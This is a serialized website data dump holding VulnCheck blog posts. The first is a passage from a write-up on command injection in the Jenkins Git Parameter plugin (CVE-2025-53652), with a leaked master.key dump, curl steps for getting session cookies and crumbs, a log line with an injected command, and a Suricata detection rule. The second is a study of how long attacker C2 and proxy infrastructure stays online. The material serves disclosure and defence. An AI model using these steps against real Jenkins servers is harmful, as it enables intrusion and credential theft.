~\u002Fsecrets\u002Fmaster.key\n",[1373,36438,36439],{"class":1375,"line":4756},[1373,36440,36441],{"class":9383},"05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a\n",[18,36443,36444,36445,36448,36449,59],{},"The output confirms that the shell runs as the ",[886,36446,36447],{},"jenkins"," user, and we’re able to read the ",[886,36450,36451],{},"master.key",[1920,36453,36455],{"id":36454},"authenticated-or-not","Authenticated or Not?",[18,36457,36458,36459,36462],{},"By default, Jenkins requires authentication, and under that configuration, this vulnerability does require credentials. Yet the CVSS vector assigned to it includes ",[886,36460,36461],{},"PR:N"," (Privileges Required: None). This rating is based on two possible configurations:",[1789,36464,36465,36468],{},[25,36466,36467],{},"Jenkins can be set up with authentication disabled entirely.",[25,36469,36470],{},"Jenkins can allow anyone to create accounts freely.",[18,36472,36473],{},[68,36474],{":width":10862,"alt":36475,"src":36476},"Auth configuration options","\u002Fblog\u002Fgit-parameter-rce\u002Fdisable-auth.png",[18,36478,36479,36480,36483,36484,36487,36488,36491],{},"While arbitrary user sign-up is uncommon, unauthenticated Jenkins instances are not. According to FOFA, out of more than 100,000",[47,36481,491],{"href":36482},"#user-content-fn-3"," internet-facing Jenkins servers that require authentication, only about 1,000",[47,36485,380],{"href":36486},"#user-content-fn-4"," have open registration. However, roughly 15,000",[47,36489,401],{"href":36490},"#user-content-fn-5"," appear to have authentication disabled entirely, though we haven’t confirmed how many of those use the Git Parameter plugin.",[18,36493,36494],{},[68,36495],{":width":10862,"alt":36496,"src":36497},"FOFA Jenkins query","\u002Fblog\u002Fgit-parameter-rce\u002Ffofa-unauth.png",[18,36499,36500],{},"Even when authentication is disabled, exploitation still requires a valid session cookie, knowledge of the build name, and the Jenkins crumb. This might slow down tools like Nuclei, but it's unlikely to stop a determined attacker. All of this can typically be retrieved with just a couple of requests:",[1354,36502,36504],{"className":34366,"code":36503,"language":34368,"meta":219,"style":219},"curl -kv http:\u002F\u002Flocalhost:8080\u002F -o \u002Fdev\u002Fnull\ncurl -kv http:\u002F\u002Flocalhost:8080\u002Fjob\u002FbuildName\u002Fbuild -H 'Cookie: [cookie]' | grep \"data-crumb-value=\"\n",[886,36505,36506,36511],{"__ignoreMap":219},[1373,36507,36508],{"class":1375,"line":1376},[1373,36509,36510],{"class":9383},"curl -kv http:\u002F\u002Flocalhost:8080\u002F -o \u002Fdev\u002Fnull\n",[1373,36512,36513],{"class":1375,"line":220},[1373,36514,36515],{"class":9383},"curl -kv http:\u002F\u002Flocalhost:8080\u002Fjob\u002FbuildName\u002Fbuild -H 'Cookie: [cookie]' | grep \"data-crumb-value=\"\n",[18,36517,36518],{},"From there, exploitation proceeds as described above.",[1920,36520,36522],{"id":36521},"detections-and-indicators","Detections and Indicators",[18,36524,36525],{},"One nice thing about the Jenkins plugin system is that it clearly informs administrators when a plugin needs to be upgraded.",[18,36527,36528],{},[68,36529],{":width":10862,"alt":36496,"src":36530},"\u002Fblog\u002Fgit-parameter-rce\u002Fplugin-warning.png",[18,36532,36533,36534,36537],{},"Although Jenkins clearly flags outdated plugins, the Git Parameter patch",[47,36535,356],{"href":36536},"#user-content-fn-6"," includes a flag that allows the fix to be disabled:",[1925,36539,36540,36543],{},[18,36541,36542],{},"If a bug in the plugin prevents you from using that safer setting, the validation can be disabled by setting the system property",[1354,36544,36547],{"className":36545,"code":36546,"language":1359,"meta":219},[1357],"-Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true\n",[886,36548,36546],{"__ignoreMap":219},[18,36550,36551],{},"As a result, this vulnerability may persist even after the plugin is upgraded. The most reliable place to detect exploitation is on the wire. To help with that, the VulnCheck Initial Access team has developed the following Suricata rule:",[1354,36553,36556],{"className":36554,"code":36555,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Jenkins Git-Parameter Plugin CVE-2025-53652 Build Param Injection\"; \\\n flow:established,to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Fjob\"; startswith; \\\n content:\"\u002Fbuild\"; \\\n http.request_body; content:\"parameter\"; \\\n content:\"name\"; distance: 0; \\\n content:\"Jenkins-Crumb\"; \\\n content:\"value\"; \\\n pcre:\"\u002Fvalue[^&]*(\\;|%3b|\\||%7c|\u003C|%3c|>|%3e|\\(|%28|\\)|%29|$|%24|`|%60|\\\"|%22|'|%27|\\\\|%5c|%26)\u002Fi\"; \\\n reference:cve,CVE-2025-53652; \\\n classtype:web-application-attack; \\\n sid:12700622; rev:2; \\\n metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[886,36557,36555],{"__ignoreMap":219},[18,36559,36560,36561,36564],{},"As mentioned earlier, the injected parameter also persists in Jenkins job logs. These logs can be found on disk under ",[886,36562,36563],{},"~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F#\u002Flog",". For example:",[1354,36566,36568],{"className":34366,"code":36567,"language":34368,"meta":219,"style":219},"jenkins@2e8cd409b819:~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F17$ cat log\nStarted by user\n… truncated …\nThe recommended git tool is: NONE\nusing credential f0cb5f5f-fa1a-4a89-9f1d-63d6bbaff7c8\n > git rev-parse --resolve-git-dir \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)\u002F.git # timeout=10\n",[886,36569,36570,36580,36585,36590,36595,36600],{"__ignoreMap":219},[1373,36571,36572,36575,36577],{"class":1375,"line":1376},[1373,36573,36574],{"class":9372},"jenkins@2e8cd409b819:~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F17",[1373,36576,4644],{"class":1383},[1373,36578,36579],{"class":4640}," cat log\n",[1373,36581,36582],{"class":1375,"line":220},[1373,36583,36584],{"class":9383},"Started by user\n",[1373,36586,36587],{"class":1375,"line":1266},[1373,36588,36589],{"class":9383},"… truncated …\n",[1373,36591,36592],{"class":1375,"line":1852},[1373,36593,36594],{"class":9383},"The recommended git tool is: NONE\n",[1373,36596,36597],{"class":1375,"line":4692},[1373,36598,36599],{"class":9383},"using credential f0cb5f5f-fa1a-4a89-9f1d-63d6bbaff7c8\n",[1373,36601,36602],{"class":1375,"line":4724},[1373,36603,36604],{"class":9383}," > git rev-parse --resolve-git-dir \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)\u002F.git # timeout=10\n",[18,36606,36607],{},"In short, traces of exploitation may linger both on the wire and on disk.",[1920,36609,1903],{"id":1902},[18,36611,36612],{},"This vulnerability, originally disclosed as medium severity, ultimately has the characteristics of a critical issue. While we don’t expect widespread exploitation, it’s the kind of flaw that attackers will find useful, particularly in targeted environments or during lateral movement.",[18,36614,36615],{},"And while we had hoped for some creative Git parameter golf, it turned out to be straightforward command injection. No trick shots required.",[1920,36617,202],{"id":201},[18,36619,36620,36621,1246,36626,1246,36631,1255,36638,59],{},"The VulnCheck team is always on the lookout for new and interesting vulnerabilities to abuse. For more research like this, see our blogs ",[1131,36622,36623],{},[47,36624,35917],{"href":35913,"rel":36625},[51],[1131,36627,36628],{},[47,36629,35924],{"href":35920,"rel":36630},[51],[1131,36632,36633],{},[47,36634,36637],{"href":36635,"rel":36636},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fprojectsend-exploited-itw",[51],"ProjectSend CVE-2024-11680 Exploited in the Wild",[1131,36639,36640],{},[47,36641,35931],{"href":35927,"rel":36642},[51],[18,36644,33941,36645,33945,36648,1240,36651,1246,36654,1255,36657,1260],{},[47,36646,1233],{"href":10806,"rel":36647},[51],[47,36649,1239],{"href":1237,"rel":36650},[51],[47,36652,1245],{"href":1243,"rel":36653},[51],[47,36655,1251],{"href":1249,"rel":36656},[51],[47,36658,216],{"href":1258,"rel":36659},[51],[1920,36661,2850],{"id":2849},[61,36663,36665],{"id":36664},"footnotes","Footnotes",[1789,36667,36668,36678,36687,36696,36705,36714],{},[25,36669,36670,10515,36674],{},[47,36671,36672],{"href":36672,"rel":36673},"https:\u002F\u002Fwww.jenkins.io\u002Fsecurity\u002Fadvisory\u002F2025-07-09\u002F#SECURITY-3419",[51],[47,36675,36677],{"href":36676},"#user-content-fnref-1","↩",[25,36679,36680,10515,36684],{},[47,36681,36682],{"href":36682,"rel":36683},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fgit\u002F",[51],[47,36685,36677],{"href":36686},"#user-content-fnref-2",[25,36688,36689,10515,36693],{},[47,36690,36691],{"href":36691,"rel":36692},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iYXBwLXNpZ24taW4tcmVnaXN0ZXIiICYmIGljb25faGFzaD0iODE1ODYzMTIi",[51],[47,36694,36677],{"href":36695},"#user-content-fnref-3",[25,36697,36698,10515,36702],{},[47,36699,36700],{"href":36700,"rel":36701},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iYXBwLXNpZ24taW4tcmVnaXN0ZXJfX3N3aXRjaGVyIiAmJiBpY29uX2hhc2g9IjgxNTg2MzEyIg%3D%3D",[51],[47,36703,36677],{"href":36704},"#user-content-fnref-4",[25,36706,36707,10515,36711],{},[47,36708,36709],{"href":36709,"rel":36710},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iSmVua2lucy1DcnVtYiIgJiYgaWNvbl9oYXNoPSI4MTU4NjMxMiI%3D",[51],[47,36712,36677],{"href":36713},"#user-content-fnref-5",[25,36715,36716,10515,36720],{},[47,36717,36718],{"href":36718,"rel":36719},"https:\u002F\u002Fgithub.com\u002Fjenkinsci\u002Fgit-parameter-plugin\u002Fcommit\u002Fcab84d3703c267dbdf3e1b4a06fcc51bbed4fcba",[51],[47,36721,36677],{"href":36722},"#user-content-fnref-6",[2901,36724,36725],{},"html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}",{"title":219,"searchDepth":220,"depth":220,"links":36727},[36728],{"id":36664,"depth":220,"text":36665},"2025-08-07","CVE-2025-53652 was disclosed as a medium-severity vulnerability in the Jenkins Git Parameter plugin but it enables command injection and remote code execution when this popular plugin is installed. We break down the vulnerability and share detection guidance for defenders.",{"slug":36732},"git-parameter-rce","\u002Fblog\u002Fgit-parameter-rce",{"title":32017,"description":36730},"blog\u002Fgit-parameter-rce",[242,23275,1281],"Ftxmy0eO79IqVtCbbcrKZo9fxX8FBDqoR_bdPH7vV-I",{"id":36739,"title":36740,"articles":7,"authors":36741,"body":36743,"date":37228,"description":37229,"extension":234,"image":7,"link":7,"meta":37230,"navigation":237,"path":37232,"seo":37233,"series":7,"stem":37234,"subtype":7,"tags":37235,"__hash__":37236},"blog\u002Fblog\u002Fstillup-stillevil.md","Still Up. Still Evil.",[36742],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":36744,"toc":37225},[36745,36749,36752,36762,36769,36772,36776,36779,36951,36954,36958,36962,36982,36990,37019,37025,37028,37039,37045,37049,37091,37094,37156,37166,37169,37173,37176,37178,37181,37183,37206,37223],[1920,36746,36748],{"id":36747},"a-look-at-attacker-infrastructure-longevity","A Look at Attacker Infrastructure Longevity",[263,36750],{":list":36751,"ico":266,"title":20},"[\"Attacker infrastructure often persists for months. Tools like GoPhish, GOST, and Metasploit regularly remained online for the full 90-day analysis window.\",\"Lifespan reflects purpose. Short-lived frameworks like Cobalt Strike and Sliver support hands-on-keyboard operations, while proxies like SoftEther are left running to serve longer-term goals.\",\"Exposed infrastructure still gets used. Attackers continue to use exposed systems to achieve real-world objectives, even well after they’ve been identified by defenders.\"]",[18,36753,36754,36755,36761],{},"In our recent publication, ",[1131,36756,36757],{},[47,36758,36760],{"href":35920,"rel":36759},[51],"The Linuxsys Cryptominer",", we discussed attacker infrastructure that had been in use for eight months. Despite widespread exploit attempts, blog coverage, and security community chatter, the attacker stuck with the same setup. Same hosting. Same domain. No apparent disruption. So we took a closer look: how long do attackers typically keep their infrastructure running?",[18,36763,36764,36765,36768],{},"As part of our ",[47,36766,1251],{"href":1249,"rel":36767},[51]," offering, VulnCheck tracks over 100 different types of attacker software operating on internet-facing systems. Using this data, we examined how long attackers maintained their infrastructure over a 90-day period, from March through July 2025.",[18,36770,36771],{},"For this analysis, we focused on hosts associated with domain names. This allowed us to track infrastructure across IP rotations but excluded setups that do not rely on traditional domain resolution. These include IP-only botnets, peer-to-peer malware, TOR-based C2, and domain fronting via services like Cloudflare. These techniques add complexity to attribution and persistence tracking and were omitted to keep the analysis consistent.",[1920,36773,36775],{"id":36774},"attacker-tooling-longevity","Attacker Tooling Longevity",[18,36777,36778],{},"Over the 90-day period, we observed a wide range of attacker tooling in use. To keep things concise, here are the top ten by number of observed instances.",[307,36780,36781,36800],{},[310,36782,36783],{},[313,36784,36785,36788,36791,36794,36797],{},[316,36786,36787],{},"Tool Name",[316,36789,36790],{},"Instances Observed",[316,36792,36793],{},"Shortest Duration",[316,36795,36796],{},"Longest Duration",[316,36798,36799],{},"Median Duration",[336,36801,36802,36818,36833,36848,36862,36877,36892,36907,36922,36938],{},[313,36803,36804,36807,36810,36812,36815],{},[341,36805,36806],{},"GoPhish",[341,36808,36809],{},"376",[341,36811,12467],{},[341,36813,36814],{},"90 days",[341,36816,36817],{},"28 days",[313,36819,36820,36823,36826,36828,36830],{},[341,36821,36822],{},"Cobalt Strike",[341,36824,36825],{},"196",[341,36827,12467],{},[341,36829,36814],{},[341,36831,36832],{},"12.5 days",[313,36834,36835,36838,36841,36843,36845],{},[341,36836,36837],{},"Sliver",[341,36839,36840],{},"178",[341,36842,12467],{},[341,36844,36814],{},[341,36846,36847],{},"8 days",[313,36849,36850,36853,36856,36858,36860],{},[341,36851,36852],{},"Metasploit",[341,36854,36855],{},"94",[341,36857,12467],{},[341,36859,36814],{},[341,36861,36814],{},[313,36863,36864,36867,36870,36872,36874],{},[341,36865,36866],{},"Starkiller",[341,36868,36869],{},"78",[341,36871,12467],{},[341,36873,36814],{},[341,36875,36876],{},"10 days",[313,36878,36879,36882,36885,36887,36889],{},[341,36880,36881],{},"Havoc",[341,36883,36884],{},"60",[341,36886,12467],{},[341,36888,36814],{},[341,36890,36891],{},"10.5 days",[313,36893,36894,36897,36900,36902,36904],{},[341,36895,36896],{},"Mythic",[341,36898,36899],{},"39",[341,36901,12467],{},[341,36903,36814],{},[341,36905,36906],{},"9 days",[313,36908,36909,36912,36915,36917,36919],{},[341,36910,36911],{},"msfconsole",[341,36913,36914],{},"24",[341,36916,12467],{},[341,36918,36814],{},[341,36920,36921],{},"22.5 days",[313,36923,36924,36927,36930,36932,36935],{},[341,36925,36926],{},"Confluence Godzilla Loader",[341,36928,36929],{},"20",[341,36931,12467],{},[341,36933,36934],{},"79 days",[341,36936,36937],{},"19 days",[313,36939,36940,36943,36945,36947,36949],{},[341,36941,36942],{},"Gh0st RAT",[341,36944,2837],{},[341,36946,12467],{},[341,36948,36814],{},[341,36950,12467],{},[18,36952,36953],{},"Nearly every tool we tracked hit the maximum possible value for \"Longest Duration,\" filling or exceeding the 90-day window. This suggests that, despite exposure and visibility, it's not unusual for attackers to run the same infrastructure for months at a time.",[61,36955,36957],{"id":36956},"attacker-tool-availability-days","Attacker Tool Availability (Days)",[11128,36959],{":labels":36960,":values":36961},"[\"GoPhish\",\"Cobalt Strike\",\"Sliver\",\"Metasploit\",\"Starkiller\",\"Havoc\",\"Mythic\",\"msfconsole\",\"Confluence Godzilla Loader\",\"Gh0st RAT\"]","[28,12.5,8,90,10,10.5,9,22.5,19,1]",[18,36963,36964,36965,1246,36969,1246,36973,1255,36977,36981],{},"However, the median durations are more modest. For offensive tooling, such as ",[47,36966,36822],{"href":36967,"rel":36968},"https:\u002F\u002Fwww.cobaltstrike.com\u002F",[51],[47,36970,36837],{"href":36971,"rel":36972},"https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fsliver",[51],[47,36974,36881],{"href":36975,"rel":36976},"https:\u002F\u002Fgithub.com\u002FHavocFramework\u002FHavoc",[51],[47,36978,36896],{"href":36979,"rel":36980},"https:\u002F\u002Fgithub.com\u002Fits-a-feature\u002FMythic",[51],", a median lifespan of about a week makes operational sense. These frameworks are typically spun up temporarily by red teams or APT groups, then torn down when the operation ends or transitions to a new stage.",[18,36983,36984,36985,36989],{},"A surprising outlier among offensive tools is ",[47,36986,36911],{"href":36987,"rel":36988},"https:\u002F\u002Fdocs.metasploit.com\u002Fdocs\u002Fusing-metasploit\u002Fbasics\u002Fhow-to-use-a-reverse-shell-in-metasploit.html#on-this-page",[51],". (Note: our dataset distinguishes \"Metasploit\" as the web-based UI, while \"msfconsole\" refers to active exploit listeners.) msfconsole sessions are usually short-lived—just seconds or minutes when used for single-shot exploitation. So, when we observe long durations, like the 22.5-day median above, it likely reflects client-based attacks (e.g., phishing or malicious documents) that require the listener to remain active indefinitely, or broad internet-wide scanning efforts.",[18,36991,36992,36993,982,36997,37001,37002,982,37005,37008,37009,37011,37012,982,37015,37018],{},"Long durations for ",[47,36994,36852],{"href":36995,"rel":36996},"https:\u002F\u002Fdocs.rapid7.com\u002Fmetasploit\u002Fmetasploit-web-interface-overview\u002F",[51],[47,36998,36806],{"href":36999,"rel":37000},"https:\u002F\u002Fgetgophish.com\u002F",[51]," are less surprising, as we’re tracking their web interfaces. These likely include testing setups or production instances deployed by legitimate security teams, systems that simply don't move much. This is supported by domain names like ",[886,37003,37004],{},"gophish.secopan[.]de",[886,37006,37007],{},"gophish.dev.apollosecure[.]com",".\nThat said, real-world attackers do use GoPhish",[1373,37010,34237],{},", and our dataset includes domains like ",[886,37013,37014],{},"mlcrosoft[.]in",[886,37016,37017],{},"githuh[.]fr",". Fortunately, many of these are eventually picked up and blocked by Spamhaus, although we observed a significant delay between our first sighting and Spamhaus enforcement.",[18,37020,37021],{},[68,37022],{":width":10862,"alt":37023,"src":37024},"SpamHaus GoPhish block notice","\u002Fblog\u002Fstillup-stillevil\u002Fspamhaus.png",[18,37026,37027],{},"Starkiller, the GUI front-end for PowerShell Empire, might also fall into this mixed-use category. However, its 10-day median duration aligns more closely with frameworks like Cobalt Strike and Sliver, suggesting it's more often used for hands-on-keyboard activity.",[18,37029,37030,37031,37034,37035,37038],{},"The final entry worth highlighting is the Confluence ",[47,37032,22194],{"href":22192,"rel":37033},[51]," Loader, an in-memory webshell that we documented in ",[47,37036,22211],{"href":22207,"rel":37037},[51],", published approximately 16 months ago. Its continued presence is a reminder that n-day vulnerabilities, even well-documented ones, can persist long after initial disclosure.",[18,37040,37041],{},[68,37042],{":width":10862,"alt":37043,"src":37044},"Confluence Godzilla Loader in the wild","\u002Fblog\u002Fstillup-stillevil\u002Fgodzilla-loader.png",[1920,37046,37048],{"id":37047},"attacker-oriented-proxy-longevity","Attacker-Oriented Proxy Longevity",[18,37050,37051,37052,37057,37058,1246,37063,1246,37068,37073,37074,37079,37080,982,37085,37090],{},"We track a wide array of proxies, but there is a subset we classify as attack-oriented due to their popularity among APTs or their design for offensive operations. For example, ",[47,37053,37056],{"href":37054,"rel":37055},"https:\u002F\u002Fgithub.com\u002FSoftEtherVPN\u002FSoftEtherVPN",[51],"SoftEther"," has been linked to ",[47,37059,37062],{"href":37060,"rel":37061},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fflax%20typhoon",[51],"Flax Typhoon",[47,37064,37067],{"href":37065,"rel":37066},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FEarth%20Krahang",[51],"Earth Krahang",[47,37069,37072],{"href":37070,"rel":37071},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FToddyCat",[51],"ToddyCat",", and others, while ",[47,37075,37078],{"href":37076,"rel":37077},"https:\u002F\u002Fgithub.com\u002Ffatedier\u002Ffrp",[51],"Fast Reverse Proxy"," (frp) is used by groups like ",[47,37081,37084],{"href":37082,"rel":37083},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FVolt%20Typhoon",[51],"Volt Typhoon",[47,37086,37089],{"href":37087,"rel":37088},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FAPT35",[51],"APT35",". These tools often form the backbone of covert channels or post-exploitation pivots, and are treated as critical infrastructure by operators.",[18,37092,37093],{},"Focusing again on domain-associated instances, our top three attack-oriented proxies were:",[307,37095,37096,37110],{},[310,37097,37098],{},[313,37099,37100,37102,37104,37106,37108],{},[316,37101,36787],{},[316,37103,36790],{},[316,37105,36793],{},[316,37107,36796],{},[316,37109,36799],{},[336,37111,37112,37126,37141],{},[313,37113,37114,37116,37119,37121,37123],{},[341,37115,37056],{},[341,37117,37118],{},"25833",[341,37120,12467],{},[341,37122,36814],{},[341,37124,37125],{},"59 days",[313,37127,37128,37131,37134,37136,37138],{},[341,37129,37130],{},"GOST",[341,37132,37133],{},"1633",[341,37135,12467],{},[341,37137,36814],{},[341,37139,37140],{},"48 days",[313,37142,37143,37146,37149,37151,37153],{},[341,37144,37145],{},"FRP Dashboard",[341,37147,37148],{},"21",[341,37150,12467],{},[341,37152,36814],{},[341,37154,37155],{},"12 days",[18,37157,37158,37159,37163,37164,59],{},"The median durations of SoftEther and ",[47,37160,37130],{"href":37161,"rel":37162},"https:\u002F\u002Fgithub.com\u002Fgo-gost\u002Fgost",[51]," reflect what we typically expect from long-lived attacker infrastructure. In contrast, the FRP dashboard, a web interface for FRP, had a much shorter median lifespan of 12 days. This aligns with attacker behavior observed in the wild, where FRP is used to create temporary reverse proxy tunnels during targeted operations",[1373,37165,34289],{},[18,37167,37168],{},"For this analysis, we only included instances where the dashboard was exposed over a domain name, so the actual number of FRP deployments is likely higher. Even so, the short-lived nature of these dashboards suggests intentional churn. Attackers appear to spin up access points when needed, then quickly tear them down to avoid detection and reduce risk.",[1920,37170,37172],{"id":37171},"a-note-on-the-data","A Note On the Data",[18,37174,37175],{},"The infrastructure we track is largely misconfigured. Our visibility depends on factors like default TLS certificates, exposed web dashboards, unchanged landing pages, or services that simply shouldn’t be internet-facing. That means our dataset is inherently biased. We're likely missing the more disciplined attackers who know how to hide their infrastructure properly. There's no perfect fix for this, but it's worth calling out. The analysis here reflects what we can see, not necessarily the full picture.",[1920,37177,1903],{"id":1902},[18,37179,37180],{},"Attacker infrastructure doesn't always disappear quickly. Some tools, like Cobalt Strike and Sliver, are used briefly and torn down, but others, like GoPhish, SoftEther, and GOST, often stick around for months. Even when domains are publicly flagged or discussed, attackers seem to be able to use these systems, presumably sufficiently enough to achieve their goals. In the end, infrastructure lifespan depends on intent. Whether temporary or persistent, attackers are clearly comfortable leaving systems exposed longer than defenders might expect.",[1920,37182,202],{"id":201},[18,37184,37185,37186,1246,37191,1246,37196,1255,37201,59],{},"The VulnCheck team is always on the lookout for new and interesting attacker behavior. For more research like this, see our blogs ",[47,37187,37189],{"href":35913,"rel":37188},[51],[1131,37190,35917],{},[47,37192,37194],{"href":35920,"rel":37193},[51],[1131,37195,35924],{},[47,37197,37199],{"href":36635,"rel":37198},[51],[1131,37200,36637],{},[47,37202,37204],{"href":35927,"rel":37203},[51],[1131,37205,35931],{},[18,37207,33941,37208,33945,37211,1240,37214,1246,37217,1255,37220,1260],{},[47,37209,1233],{"href":10806,"rel":37210},[51],[47,37212,1239],{"href":1237,"rel":37213},[51],[47,37215,1245],{"href":1243,"rel":37216},[51],[47,37218,1251],{"href":1249,"rel":37219},[51],[47,37221,216],{"href":1258,"rel":37222},[51],[1920,37224,2850],{"id":2849},{"title":219,"searchDepth":220,"depth":220,"links":37226},[37227],{"id":36956,"depth":220,"text":36957},"2025-07-31","VulnCheck tracked thousands of attacker systems over a 90-day window to see how long malicious infrastructure really lasts. The results show that exposure doesn’t mean disruption, as many phishing kits, proxies, and C2 tools stay online for weeks or even months.",{"slug":37231},"stillup-stillevil","\u002Fblog\u002Fstillup-stillevil",{"title":36740,"description":37229},"blog\u002Fstillup-stillevil",[23275,26421],"ssgp84I__cixeEBTLHXly9OOSghZ7O4YA4bm6qApreQ",{"id":37238,"title":37239,"articles":37240,"authors":37284,"body":37286,"date":37244,"description":37562,"extension":234,"image":7,"link":7,"meta":37563,"navigation":237,"path":37565,"seo":37566,"series":7,"stem":37567,"subtype":7,"tags":37568,"__hash__":37569},"blog\u002Fblog\u002Fstate-of-exploitation-1h-2025.md","State of Exploitation - A look Into The 1H-2025 Vulnerability Exploitation & Threat Activity",[37241,37245,37248,37251,37255,37259,37264,37269,37273,37276,37281],{"title":37242,"source":19484,"link":37243,"date":37244},"Third of Exploited Vulnerabilities Weaponized Within a Day of Disclosure","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fthird-kev-exploited\u002F","2025-07-30",{"title":37246,"source":12182,"link":37247,"date":37228},"32% of exploited vulnerabilities are now zero-days or 1-days","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4031603\u002F32-of-exploited-vulnerabilities-are-now-zero-days-or-1-days.html",{"title":37249,"source":12153,"link":37250,"date":37228},"Accelerated vulnerability exploitation examined","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Faccelerated-vulnerability-exploitation-examined",{"title":37252,"source":12157,"link":37253,"date":37254},"Risky Bulletin: Russia spies on foreign embassies using local ISPs","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-russia-spies-on-foreign-embassies-using-local-isps\u002F","2025-08-01",{"title":37256,"source":14382,"link":37257,"date":37258},"Weekly Recap: VPN 0-Day, Encryption Backdoor, AI Malware, macOS Flaw, ATM Hack & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F08\u002Fweekly-recap-vpn-0-day-encryption.html","2025-08-04",{"title":37260,"source":37261,"link":37262,"date":37263},"Why defenders must act faster than ever to outpace vulnerability exploitation","Digitalisation World","https:\u002F\u002Fm.digitalisationworld.com\u002Fblogs\u002F58532\u002Fwhy-defenders-must-act-faster-than-ever-to-outpace-vulnerability-exploitation","2025-09-28",{"title":37265,"source":37266,"link":37267,"date":37268},"Threat actors are exploiting flaws more quickly -- here's what business leaders should do","IT Pro","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fcyber-attacks\u002Fthreat-actors-exploiting-quickly-what-business-leaders-should-do","2025-10-21",{"title":37270,"source":19484,"link":37271,"date":37272},"Five Key Flaws Exploited in 2025's Major Software Supply Chain Incidents","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews-features\u002Ffive-flaws-exploited-2025-software\u002F","2025-12-29",{"title":37274,"source":25685,"link":37275,"date":23299},"Top 10 High-Risk Vulnerabilities Of 2025 that Exploited in the Wild","https:\u002F\u002Fcybersecuritynews.com\u002F10-high-risk-vulnerabilities-of-2025\u002F",{"title":37277,"source":37278,"link":37279,"date":37280},"The patching treadmill: Why traditional application security is no longer 